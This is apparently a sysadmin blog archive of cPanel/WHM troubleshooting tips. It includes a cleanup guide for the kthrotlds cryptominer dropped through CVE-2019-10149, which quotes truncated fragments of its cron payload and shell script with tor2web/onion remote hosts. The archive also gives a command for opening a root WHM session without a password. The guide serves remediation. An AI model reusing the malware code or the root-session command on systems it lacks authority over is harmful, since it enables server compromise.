whmapi1 sethostname hostname=new_hostname
cPanel cli change hostname
Leave a reply
Tag Archives: cPanel
sender verify fail for The mail server could not deliver mail to The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.
cPanel whitelist sender
WHM >> Service Configuration >> Exim Configuration Manager
Sender verification bypass IP addresses
Trusted SMTP IP addresses
cPanel change email password command line
Change info password
pass=$(python3 -c 'import crypt; print(crypt.crypt("mynewpassword", crypt.mksalt(crypt.METHOD_SHA512)))') ; sed -e -i "s,^info:[^:]\+:,info:$pass:," /home/cpanel_username/etc/yourdomain.com/shadow
whm login without password
whmapi1 create_user_session user=root service=whostmgrd
die [Internal Death while parsing ./webmail/paper_lantern/index.html 2429281] Template::Exception:
[TYPE]=[file]
[INFO]=[mail_clients/mail_clients.tt: not found]
[TEXT]=[]
at cpanel.pl line 1126.
cpanel::cpanel::cptt_exectag("/usr/local/cpanel/base/webmail/paper_lantern/index.auto.tmpl", 1) called at cpanel.pl line 4606
cpanel::cpanel::run_standard_mode() called at cpanel.pl line 930
cpanel::cpanel::script("cpanel::cpanel", "-webmail", "./webmail/paper_lantern/index.html") called at cpanel.pl line 32
info [webmaild] show_template.stor lacked output with exit code: 127 at /usr/local/cpanel/Cpanel/Server.pm line 1381.
Cpanel::Server::process_login_template(Cpanel::Server=HASH(0x29ce220), __CPANEL_HIDDEN__, __CPANEL_HIDDEN__, 1, __CPANEL_HIDDEN__, undef, __CPANEL_HIDDEN__, 1, ...) called at /usr/local/cpanel/Cpanel/Server.pm line 2085
Cpanel::Server::process_and_send_login_template(Cpanel::Server=HASH(0x29ce220), "login", "HTTP/1.1 200 OK\x{d}\x{a}Set-Cookie: webmailrelogin=no; HttpOnly; exp"..., HASH(0x2cb1658)) called at /usr/local/cpanel/Cpanel/Server.pm line 926
Cpanel::Server::badpass(Cpanel::Server=HASH(0x29ce220), __CPANEL_HIDDEN__, 1, __CPANEL_HIDDEN__, 1) called at cpsrvd.pl line 5402
cpanel::cpsrvd::handle_auth() called at cpsrvd.pl line 1332
cpanel::cpsrvd::handle_one_connection(11) called at cpsrvd.pl line 1114
cpanel::cpsrvd::script() called at cpsrvd.pl line 434
Failed to show template “login” in login theme “cpanel” (); falling back to legacy login. at /usr/local/cpanel/Cpanel/Server.pm line 2089.
Solution cloud be:
cd /usr/local/cpanel/base/frontend
mv -v paper_lantern paper_lantern_backup
/usr/local/cpanel/scripts/upcp --force
License User Limit Exceeded cPanel
License User Limit Exceeded
6 users exist on this server, but the current license allows only 5 users.
Because of this excess, this server has locked all cPanel users out of their accounts.
You need to upgrade your cPanel/WHM license and than:
/usr/local/cpanel/cpkeyclt
Cannot Read License File
cPanel/WHM fix the license:
/usr/local/cpanel/cpkeyclt
Updating cPanel license...Done. Update succeeded.
cPanel imunify antivirus
yum install imunify-antivirus-cpanel
/opt/alt/php73/usr/bin/php -n -d short_open_tag=on -d extension=json.so -d extension=mbstring.so -d extension=leveldb.so /opt/ai-bolit/ai-bolit-hoster.php --smart --deobfuscate --avdb /var/imunify360/files/sigs/v1/aibolit/ai-bolit-hoster.db --no-html --json_report . --json-stdout --memory 2048M --listing /var/imunify360/tmp/tmpopv7tg06 --progress /var/imunify360/tmp/ai_bolit_progress_15820124375361592.json --with-suspicious --size 1048576 --cloud-assist IMUNIFYAV --cloudscan-size 10485760
cPanel exim log more information
Exim Configuration Manager -> Advanced Editor
log_selector:
+incoming_port +smtp_connection +all_parents +retry_defer +subject +arguments +received_recipients +address_rewrite +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +lost_incoming_connection +queue_run +received_sender +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_protocol_error +smtp_syntax_error +tls_cipher +tls_peerdn
Invalid command ‘SetEnv’ cPanel
yum install ea-apache24-mod_env
.htaccess: Invalid command ‘SetEnv’, perhaps misspelled or defined by a module not included in the server configuration, referer:
cPanel disable ForcePassiveIP
rm -rvf /var/cpanel/conf/pureftpd/main.cache
vim /var/cpanel/conf/pureftpd/main
Comment or remove ForcePassiveIP
FTP error usually looks like this:
The data connection cannot be established: ECONNREFUSED – Connection refused by the server.
pure-ftpd[]: (?@?) [DEBUG] Couldn’t load the DH parameters file /etc/ssl/private/pure-ftpd-dhparams.pem
openssl dhparam -out /etc/ssl/private/pure-ftpd-dhparams.pem 3072
Generating DH parameters, 3072 bit long safe prime, generator 2
This is going to take a long time
/scripts/restartsrv_pureftpd
service pure-ftpd status
systemd[1]: Started Pure-FTPd.
kthrotlds CVE-2019-10149 Exim/cPanel
If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:
pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists
Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.
You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.
While fixing this issue my advice is to stop crond service: service crond stop
Than you should find all files which could be affected:
grep -r passwd /var/spool/cron*
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′
If its cPanel server, you need to check Exim version like this:
whmapi1 installed_versions packages=1|grep exim
exim: 4.91-4
– exim-4.91-4.cp1170.x86_64
or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02
To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:
whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27
It means 78.0.27
or
cpanel_and_whm: 11.80.0.14
It means 80.0.14
vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
Than:
/scripts/upcp
Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.
You can all modified file during last 5 days:
find /etc/ -mtime -5 -print
This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.
Webmail Internal Server Error 500 No response from subprocess (php) cPanel
Internal Server Error 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file
Internal Server Error: “POST /cpsess8893829692/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1” 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file.
Failed to write form data to subprocess: Broken pipe at /usr/local/cpanel/Cpanel/Server/Handlers/SubProcess.pm line 296.
rpm -ql cpanel-php72 | grep php-cgi
/usr/local/cpanel/3rdparty/php/72/bin/php-cgi
If you are missing this file you can try reinstall package or download it from another server
yum reinstall cpanel-php72
cpanel create backup
cpanel backup account command line
/scripts/pkgacct username